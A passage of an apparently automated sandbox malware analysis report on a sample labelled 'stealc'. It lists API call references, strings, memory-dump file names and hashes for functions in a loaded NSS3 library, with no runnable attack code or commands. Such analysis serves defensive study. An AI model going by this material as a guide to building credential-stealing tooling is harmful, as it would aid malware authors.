                                                                                                                                                                            • LeaveCriticalSection.KERNEL32(?,?,?,?,?,?,6C94CF46,?,6C81CDBD,?,6C94BF31), ref: 6C82B090
                                                                                                                                                                            • sqlite3_free.NSS3(?,?,?,?,?,?,6C94CF46,?,6C81CDBD,?,6C94BF31), ref: 6C82B0A2
                                                                                                                                                                            • CloseHandle.KERNEL32(?,?,6C94CF46,?,6C81CDBD,?,6C94BF31,?,?,?,?,?,?,?,?,?), ref: 6C82B100
                                                                                                                                                                            • sqlite3_free.NSS3(?,?,00000002,?,6C94CF46,?,6C81CDBD,?,6C94BF31,?,?,?,?,?,?,?), ref: 6C82B115
                                                                                                                                                                            • sqlite3_free.NSS3(?,?,?,?,?,?,6C94CF46,?,6C81CDBD,?,6C94BF31), ref: 6C82B12D
                                                                                                                                                                              • Part of subcall function 6C819EE0: EnterCriticalSection.KERNEL32(?,?,?,?,6C82C6FD,?,?,?,?,6C87F965,00000000), ref: 6C819F0E
                                                                                                                                                                              • Part of subcall function 6C819EE0: LeaveCriticalSection.KERNEL32(?,?,?,?,?,?,6C87F965,00000000), ref: 6C819F5D
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000011.00000002.2208637288.000000006C811000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C810000, based on PE: true
                                                                                                                                                                            • Associated: 00000011.00000002.2208588554.000000006C810000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2209459567.000000006C9AF000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2209534569.000000006C9EE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2209589341.000000006C9EF000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2209680200.000000006C9F0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2209730764.000000006C9F5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_17_2_6c810000_stealc_default2.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: CriticalSection$sqlite3_free$EnterLeave$CloseHandle
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 3155957115-0
                                                                                                                                                                            • Opcode ID: 97e6ff718c1f5d0f0c90e994dfa0256e3c34099e23f04bc803cea82c99a6568b
                                                                                                                                                                            • Instruction ID: 9b86494d801166fce3289b172592b1592da392fecac87d7ad91ce13193e67aca
                                                                                                                                                                            • Opcode Fuzzy Hash: 97e6ff718c1f5d0f0c90e994dfa0256e3c34099e23f04bc803cea82c99a6568b
                                                                                                                                                                            • Instruction Fuzzy Hash: 3D91B7B1A08205CFDB24CF29DA88ABBB7F1FF45304F244A2DD41697A50E739E594CB91
                                                                                                                                                                            APIs
                                                                                                                                                                            • NSS_GetAlgorithmPolicy.NSS3(00000006,?), ref: 6C8FBD48
                                                                                                                                                                            • NSS_GetAlgorithmPolicy.NSS3(00000006,?), ref: 6C8FBD68
                                                                                                                                                                            • NSS_GetAlgorithmPolicy.NSS3(00000005,?), ref: 6C8FBD83
                                                                                                                                                                            • NSS_GetAlgorithmPolicy.NSS3(00000005,?), ref: 6C8FBD9E
                                                                                                                                                                            • NSS_GetAlgorithmPolicy.NSS3(0000000A,?), ref: 6C8FBDB9
                                                                                                                                                                            • NSS_GetAlgorithmPolicy.NSS3(00000007,?), ref: 6C8FBDD0
                                                                                                                                                                            • NSS_GetAlgorithmPolicy.NSS3(000000B8,?), ref: 6C8FBDEA
                                                                                                                                                                            • NSS_GetAlgorithmPolicy.NSS3(000000BA,?), ref: 6C8FBE04
                                                                                                                                                                            • NSS_GetAlgorithmPolicy.NSS3(000000BC,?), ref: 6C8FBE1E
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000011.00000002.2208637288.000000006C811000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C810000, based on PE: true
                                                                                                                                                                            • Associated: 00000011.00000002.2208588554.000000006C810000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2209459567.000000006C9AF000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2209534569.000000006C9EE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2209589341.000000006C9EF000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2209680200.000000006C9F0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2209730764.000000006C9F5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_17_2_6c810000_stealc_default2.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: AlgorithmPolicy
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 2721248240-0
                                                                                                                                                                            • Opcode ID: a1944de77150b0a92d9c3ccd9f8201e57281be9b035694f563a6427b3d6c86ff
                                                                                                                                                                            • Instruction ID: 7bf778d7f118b4fde7c72f5ee04f25f02dfd22310b3b434845843bb0edb0b462
                                                                                                                                                                            • Opcode Fuzzy Hash: a1944de77150b0a92d9c3ccd9f8201e57281be9b035694f563a6427b3d6c86ff
                                                                                                                                                                            • Instruction Fuzzy Hash: 6721F776F042895BFB205656DE43FAB37749B917CEF0C0824F936EE641F310E41682A2
                                                                                                                                                                            APIs
                                                                                                                                                                            • PR_CallOnce.NSS3(6C9F14E4,6C95CC70), ref: 6C9A8D47
                                                                                                                                                                            • PR_GetCurrentThread.NSS3 ref: 6C9A8D98
                                                                                                                                                                              • Part of subcall function 6C880F00: PR_GetPageSize.NSS3(6C880936,FFFFE8AE,?,6C8116B7,00000000,?,6C880936,00000000,?,6C81204A), ref: 6C880F1B
                                                                                                                                                                              • Part of subcall function 6C880F00: PR_NewLogModule.NSS3(clock,6C880936,FFFFE8AE,?,6C8116B7,00000000,?,6C880936,00000000,?,6C81204A), ref: 6C880F25
                                                                                                                                                                            • PR_snprintf.NSS3(?,?,%u.%u.%u.%u,?,?,?,?), ref: 6C9A8E7B
                                                                                                                                                                            • htons.WSOCK32(?), ref: 6C9A8EDB
                                                                                                                                                                            • PR_GetCurrentThread.NSS3 ref: 6C9A8F99
                                                                                                                                                                            • PR_GetCurrentThread.NSS3 ref: 6C9A910A
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000011.00000002.2208637288.000000006C811000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C810000, based on PE: true
                                                                                                                                                                            • Associated: 00000011.00000002.2208588554.000000006C810000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2209459567.000000006C9AF000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2209534569.000000006C9EE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2209589341.000000006C9EF000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2209680200.000000006C9F0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2209730764.000000006C9F5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_17_2_6c810000_stealc_default2.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: CurrentThread$CallModuleOncePageR_snprintfSizehtons
                                                                                                                                                                            • String ID: %u.%u.%u.%u
                                                                                                                                                                            • API String ID: 1845059423-1542503432
                                                                                                                                                                            • Opcode ID: 8ec078219ade9dd6814d0a8d6f3449f695bca4cf36091d4da8f0d08234164d5d
                                                                                                                                                                            • Instruction ID: 93416b863d2decb21cb84a74933464e715fb91159022fba3dd3b70519c5b6adc
                                                                                                                                                                            • Opcode Fuzzy Hash: 8ec078219ade9dd6814d0a8d6f3449f695bca4cf36091d4da8f0d08234164d5d
                                                                                                                                                                            • Instruction Fuzzy Hash: 1F029C319092918FDB18CF59C46876ABBB7FF42308F1A825ED8915FA91C336DA47C790
                                                                                                                                                                            APIs
                                                                                                                                                                            • _byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?,?,?,?,?,?,?,?,?,6C828637,?,?), ref: 6C969E88
                                                                                                                                                                            • sqlite3_log.NSS3(0000000B,%s at line %d of [%.10s],database corruption,00011166,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4,?,?,?,?,?,?,?,?,?,?,6C828637), ref: 6C969ED6
                                                                                                                                                                            Strings
                                                                                                                                                                            • %s at line %d of [%.10s], xrefs: 6C969ECF
                                                                                                                                                                            • 9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4, xrefs: 6C969EC0
                                                                                                                                                                            • database corruption, xrefs: 6C969ECA
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000011.00000002.2208637288.000000006C811000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C810000, based on PE: true
                                                                                                                                                                            • Associated: 00000011.00000002.2208588554.000000006C810000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2209459567.000000006C9AF000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2209534569.000000006C9EE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2209589341.000000006C9EF000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2209680200.000000006C9F0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2209730764.000000006C9F5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_17_2_6c810000_stealc_default2.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: _byteswap_ulongsqlite3_log
                                                                                                                                                                            • String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$database corruption
                                                                                                                                                                            • API String ID: 912837312-598938438
                                                                                                                                                                            • Opcode ID: 85914c7746c42b5791ed6e02b38cef5a1c624a8e927eff1b3eefee9d3fcc8280
                                                                                                                                                                            • Instruction ID: b5b3d3455321b3eb889789ce1cf715e6446258623b51c057df0f3ae07c02f7de
                                                                                                                                                                            • Opcode Fuzzy Hash: 85914c7746c42b5791ed6e02b38cef5a1c624a8e927eff1b3eefee9d3fcc8280
                                                                                                                                                                            • Instruction Fuzzy Hash: 8381D531B012158FEB04CFABC980ADEB3F6EF49304B568569E915ABB81E730ED55CB50
                                                                                                                                                                            APIs
                                                                                                                                                                            • PORT_ArenaMark_Util.NSS3(?), ref: 6C8F9ED6
                                                                                                                                                                              • Part of subcall function 6C8F14C0: TlsGetValue.KERNEL32 ref: 6C8F14E0
                                                                                                                                                                              • Part of subcall function 6C8F14C0: EnterCriticalSection.KERNEL32 ref: 6C8F14F5
                                                                                                                                                                              • Part of subcall function 6C8F14C0: PR_Unlock.NSS3 ref: 6C8F150D
                                                                                                                                                                            • PORT_ArenaAlloc_Util.NSS3(?,00000024), ref: 6C8F9EE4
                                                                                                                                                                              • Part of subcall function 6C8F10C0: TlsGetValue.KERNEL32(?,6C898802,00000000,00000008,?,6C88EF74,00000000), ref: 6C8F10F3
                                                                                                                                                                              • Part of subcall function 6C8F10C0: EnterCriticalSection.KERNEL32(?,?,6C898802,00000000,00000008,?,6C88EF74,00000000), ref: 6C8F110C
                                                                                                                                                                              • Part of subcall function 6C8F10C0: PL_ArenaAllocate.NSS3(?,?,?,6C898802,00000000,00000008,?,6C88EF74,00000000), ref: 6C8F1141
                                                                                                                                                                              • Part of subcall function 6C8F10C0: PR_Unlock.NSS3(?,?,?,6C898802,00000000,00000008,?,6C88EF74,00000000), ref: 6C8F1182
                                                                                                                                                                              • Part of subcall function 6C8F10C0: TlsGetValue.KERNEL32(?,6C898802,00000000,00000008,?,6C88EF74,00000000), ref: 6C8F119C
                                                                                                                                                                            • PR_SetError.NSS3(FFFFE013,00000000), ref: 6C8F9F38
                                                                                                                                                                              • Part of subcall function 6C8FD030: PORT_NewArena_Util.NSS3(00000400,00000000,?,00000000,?,6C8F9F0B), ref: 6C8FD03B
                                                                                                                                                                              • Part of subcall function 6C8FD030: PORT_ArenaAlloc_Util.NSS3(00000000,00000028), ref: 6C8FD04E
                                                                                                                                                                              • Part of subcall function 6C8FD030: SECOID_FindOIDByTag_Util.NSS3(00000019), ref: 6C8FD07B
                                                                                                                                                                              • Part of subcall function 6C8FD030: SECITEM_CopyItem_Util.NSS3(00000000,-00000018,00000000), ref: 6C8FD08E
                                                                                                                                                                              • Part of subcall function 6C8FD030: PORT_FreeArena_Util.NSS3(00000000,00000000), ref: 6C8FD09D
                                                                                                                                                                            • PR_SetError.NSS3(FFFFE013,00000000), ref: 6C8F9F49
                                                                                                                                                                            • SEC_PKCS7DestroyContentInfo.NSS3(?), ref: 6C8F9F59
                                                                                                                                                                              • Part of subcall function 6C8F9D60: PORT_ArenaMark_Util.NSS3(?,00000000,?,?,00000000,?,6C8F9C5B), ref: 6C8F9D82
                                                                                                                                                                              • Part of subcall function 6C8F9D60: PORT_ArenaGrow_Util.NSS3(?,?,00000000,?,6C8F9C5B), ref: 6C8F9DA9
                                                                                                                                                                              • Part of subcall function 6C8F9D60: PORT_ArenaGrow_Util.NSS3(?,?,?,?,?,?,?,?,6C8F9C5B), ref: 6C8F9DCE
                                                                                                                                                                              • Part of subcall function 6C8F9D60: PORT_ArenaAlloc_Util.NSS3(?,0000000C,?,?,?,?,6C8F9C5B), ref: 6C8F9E43
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000011.00000002.2208637288.000000006C811000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C810000, based on PE: true
                                                                                                                                                                            • Associated: 00000011.00000002.2208588554.000000006C810000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2209459567.000000006C9AF000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2209534569.000000006C9EE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2209589341.000000006C9EF000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2209680200.000000006C9F0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2209730764.000000006C9F5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_17_2_6c810000_stealc_default2.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: Util$Arena$Alloc_Value$Arena_CriticalEnterErrorGrow_Mark_SectionUnlock$AllocateContentCopyDestroyFindFreeInfoItem_Tag_
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 4287675220-0
                                                                                                                                                                            • Opcode ID: 132886c8e85c4853bc8e1c53b1aed6ae3bf3f6f8f3c0773f36a280f0f549c6b0
                                                                                                                                                                            • Instruction ID: fedbee9fcfc2f04cbdaaa21e800d80eb3fec380ec2b6fccb906345603d43b4e1
                                                                                                                                                                            • Opcode Fuzzy Hash: 132886c8e85c4853bc8e1c53b1aed6ae3bf3f6f8f3c0773f36a280f0f549c6b0
                                                                                                                                                                            • Instruction Fuzzy Hash: 5E112EB5F042015BF7309E69DD0079B7354EF943CCF140635E529D7740FB62E91A8692
                                                                                                                                                                            APIs
                                                                                                                                                                            • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C9AD086
                                                                                                                                                                            • PR_Malloc.NSS3(00000001), ref: 6C9AD0B9
                                                                                                                                                                            • PR_Free.NSS3(?), ref: 6C9AD138
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000011.00000002.2208637288.000000006C811000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C810000, based on PE: true
                                                                                                                                                                            • Associated: 00000011.00000002.2208588554.000000006C810000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2209459567.000000006C9AF000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2209534569.000000006C9EE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2209589341.000000006C9EF000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2209680200.000000006C9F0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2209730764.000000006C9F5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_17_2_6c810000_stealc_default2.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: FreeMallocstrlen
                                                                                                                                                                            • String ID: >
                                                                                                                                                                            • API String ID: 1782319670-325317158
                                                                                                                                                                            • Opcode ID: 33f3c904727b78e6a3ccadd60312c31edcb67202b830285271c06c35c0548f6e
                                                                                                                                                                            • Instruction ID: 86d4c60fadb859d1121afd766274d8a73e82c1d3eebf1f54ffbcbf5c3c90d1e6
                                                                                                                                                                            • Opcode Fuzzy Hash: 33f3c904727b78e6a3ccadd60312c31edcb67202b830285271c06c35c0548f6e
                                                                                                                                                                            • Instruction Fuzzy Hash: 88D16B63B4555A4BFB1848FD8CA13EA77978743378F680329D9218FBE5E61AC943C341
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000011.00000002.2208637288.000000006C811000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C810000, based on PE: true
                                                                                                                                                                            • Associated: 00000011.00000002.2208588554.000000006C810000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2209459567.000000006C9AF000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2209534569.000000006C9EE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2209589341.000000006C9EF000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2209680200.000000006C9F0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2209730764.000000006C9F5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_17_2_6c810000_stealc_default2.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: af56b558cf1b06b080a2560eb44a8a7eed061281bc8bc5e73efc56ca3dd4ba53
                                                                                                                                                                            • Instruction ID: da81da2190453457457540a41efabb3d0d382168496c0915d00c0adcd30b20e9
                                                                                                                                                                            • Opcode Fuzzy Hash: af56b558cf1b06b080a2560eb44a8a7eed061281bc8bc5e73efc56ca3dd4ba53
                                                                                                                                                                            • Instruction Fuzzy Hash: 5EF1CEB1E09656CBDB04CF68D9403AD77B4AB9E309F258239C915D7B44EB70DA51CBC0
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000011.00000002.2208637288.000000006C811000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C810000, based on PE: true
                                                                                                                                                                            • Associated: 00000011.00000002.2208588554.000000006C810000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2209459567.000000006C9AF000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2209534569.000000006C9EE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2209589341.000000006C9EF000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2209680200.000000006C9F0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2209730764.000000006C9F5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_17_2_6c810000_stealc_default2.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: 23385cd5f386cb3e860137ed65ac044af8cee601b4759a3ea3a0d9d8a91daa8a
                                                                                                                                                                            • Instruction ID: a44a66aef4d750bdc01cc1c2b7a86c9e12425f9e6a52507040a2366728cc3016
                                                                                                                                                                            • Opcode Fuzzy Hash: 23385cd5f386cb3e860137ed65ac044af8cee601b4759a3ea3a0d9d8a91daa8a
                                                                                                                                                                            • Instruction Fuzzy Hash: E1112732A062058FD724DF18E984B5AB3B5FF4131CF184A6AD8058FE41C375D882C7D5
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000011.00000002.2208637288.000000006C811000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C810000, based on PE: true
                                                                                                                                                                            • Associated: 00000011.00000002.2208588554.000000006C810000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2209459567.000000006C9AF000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2209534569.000000006C9EE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2209589341.000000006C9EF000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2209680200.000000006C9F0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2209730764.000000006C9F5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_17_2_6c810000_stealc_default2.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: 157f6538a36853e839e68eebd254c0824208f01213f91c99a875c538810eb329
                                                                                                                                                                            • Instruction ID: 55390399a9ef1c51681494eed2cc216b35b667116a9c49e98f1436e1387bc763
                                                                                                                                                                            • Opcode Fuzzy Hash: 157f6538a36853e839e68eebd254c0824208f01213f91c99a875c538810eb329
                                                                                                                                                                            • Instruction Fuzzy Hash: B711C174708345CFDB10DF19D8C066A77A5FF85368F148479D8198BB41DB35E806CBA4
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000011.00000002.2208637288.000000006C811000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C810000, based on PE: true
                                                                                                                                                                            • Associated: 00000011.00000002.2208588554.000000006C810000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2209459567.000000006C9AF000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2209534569.000000006C9EE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2209589341.000000006C9EF000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2209680200.000000006C9F0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2209730764.000000006C9F5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_17_2_6c810000_stealc_default2.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: 9ba2eb2004aedd4f77228f2367ef2a228ee838c060cfdc78aa45cc4f3a876bfd
                                                                                                                                                                            • Instruction ID: 22fe1ad0794ad6ff051dad5d2d34942398bf6c59dc9d0825b341729d6783746f
                                                                                                                                                                            • Opcode Fuzzy Hash: 9ba2eb2004aedd4f77228f2367ef2a228ee838c060cfdc78aa45cc4f3a876bfd
                                                                                                                                                                            • Instruction Fuzzy Hash: FEE0923A202254A7EB148E0AC4A0AAD735DDF81619FB4917DCC5D9FE41D733F8038785
                                                                                                                                                                            APIs
                                                                                                                                                                            • isspace.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,?,?,?), ref: 6C8F5E08
                                                                                                                                                                            • NSSUTIL_ArgGetParamValue.NSS3(flags,?), ref: 6C8F5E3F
                                                                                                                                                                            • PL_strncasecmp.NSS3(00000000,readOnly,00000008), ref: 6C8F5E5C
                                                                                                                                                                            • free.MOZGLUE(00000000), ref: 6C8F5E7E
                                                                                                                                                                            • free.MOZGLUE(00000000), ref: 6C8F5E97
                                                                                                                                                                            • PORT_Strdup_Util.NSS3(secmod.db), ref: 6C8F5EA5
                                                                                                                                                                            • _NSSUTIL_EvaluateConfigDir.NSS3(00000000,?,?), ref: 6C8F5EBB
                                                                                                                                                                            • NSSUTIL_ArgGetParamValue.NSS3(flags,?), ref: 6C8F5ECB
                                                                                                                                                                            • PL_strncasecmp.NSS3(00000000,noModDB,00000007), ref: 6C8F5EF0
                                                                                                                                                                            • free.MOZGLUE(00000000), ref: 6C8F5F12
                                                                                                                                                                            • NSSUTIL_ArgGetParamValue.NSS3(flags,?), ref: 6C8F5F35
                                                                                                                                                                            • PL_strncasecmp.NSS3(00000000,forceSecmodChoice,00000011), ref: 6C8F5F5B
                                                                                                                                                                            • free.MOZGLUE(00000000), ref: 6C8F5F82
                                                                                                                                                                            • PL_strncasecmp.NSS3(?,configDir=,0000000A), ref: 6C8F5FA3
                                                                                                                                                                            • PL_strncasecmp.NSS3(?,secmod=,00000007), ref: 6C8F5FB7
                                                                                                                                                                            • NSSUTIL_ArgSkipParameter.NSS3(?), ref: 6C8F5FC4
                                                                                                                                                                            • free.MOZGLUE(00000000), ref: 6C8F5FDB
                                                                                                                                                                            • NSSUTIL_ArgFetchValue.NSS3(?,?), ref: 6C8F5FE9
                                                                                                                                                                            • free.MOZGLUE(00000000), ref: 6C8F5FFE
                                                                                                                                                                            • NSSUTIL_ArgFetchValue.NSS3(?,?), ref: 6C8F600C
                                                                                                                                                                            • isspace.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C8F6027
                                                                                                                                                                            • PR_smprintf.NSS3(%s/%s,?,00000000), ref: 6C8F605A
                                                                                                                                                                            • PR_smprintf.NSS3(6C9CAAF9,00000000), ref: 6C8F606A
                                                                                                                                                                            • free.MOZGLUE(00000000), ref: 6C8F607C
                                                                                                                                                                            • free.MOZGLUE(00000000), ref: 6C8F609A
                                                                                                                                                                            • free.MOZGLUE(00000000), ref: 6C8F60B2
                                                                                                                                                                            • free.MOZGLUE(?), ref: 6C8F60CE
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000011.00000002.2208637288.000000006C811000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C810000, based on PE: true
                                                                                                                                                                            • Associated: 00000011.00000002.2208588554.000000006C810000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2209459567.000000006C9AF000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2209534569.000000006C9EE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2209589341.000000006C9EF000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2209680200.000000006C9F0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2209730764.000000006C9F5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_17_2_6c810000_stealc_default2.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: free$L_strncasecmpValue$Param$FetchR_smprintfisspace$ConfigEvaluateParameterSkipStrdup_Util
                                                                                                                                                                            • String ID: %s/%s$configDir=$flags$forceSecmodChoice$noModDB$pkcs11.txt$readOnly$secmod.db$secmod=
                                                                                                                                                                            • API String ID: 1427204090-154007103
                                                                                                                                                                            • Opcode ID: b30f5c2f28d6c18a78a8e35d9513d2719e690f923f4fafa1fa1a7a6d1a1d0ae2
